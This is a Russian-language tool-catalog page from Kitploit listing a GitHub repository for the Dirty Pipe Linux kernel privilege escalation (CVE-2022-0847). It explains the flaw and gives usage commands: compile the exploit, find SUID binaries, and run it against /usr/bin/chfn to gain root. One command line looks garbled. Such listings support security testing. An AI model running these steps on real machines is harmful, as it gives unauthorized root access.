Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-0847-DirtyPipe-Exploit — CVE-2022-0847-DirtyPipe-Exploit | Kitploit
Инструменты/GitHubGitHub/v0wkeep3r/cve-2022-0847-dirtypipe-exploit
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеЭксплуатация Бинарных Файлов
GitHubv0wkeep3r/cve-2022-0847-dirtypipe-exploit

CVE-2022-0847-DirtyPipe-Exploit

CVE-2022-0847-DirtyPipe-Exploit

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
24 лет назадЕщё не проверено

CVE-2022-0847-DirtyPipe

Описание уязвимости

7 марта зарубежный исследователь безопасности Max Kellermann опубликовал в блоге информацию о локальной уязвимости повышения привилегий CVE-2022-0847 в ядре Linux: https://dirtypipe.cm4all.com/

CVE-2022-0847 — это локальная уязвимость повышения привилегий, существующая в ядре Linux версии 5.8 и выше. Используя эту уязвимость, злоумышленник может перезаписывать данные в любых читаемых файлах, тем самым повышая привилегии обычного пользователя до привилегированного root.

Принцип действия CVE-2022-0847 похож на уязвимость CVE-2016-5195 (Dirty Cow), но её гораздо проще эксплуатировать. Автор назвал эту уязвимость "Dirty Pipe".

Эксплуатация

Ссылка: https://haxx.in/files/dirtypipez.c
Автор: Max Kellermann [email protected]

root@kitploit:~
gcc -o exp exploit.c
./exp +x ./exp

# 查找suid文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

./exp /usr/bin/chfn

Скачать инструмент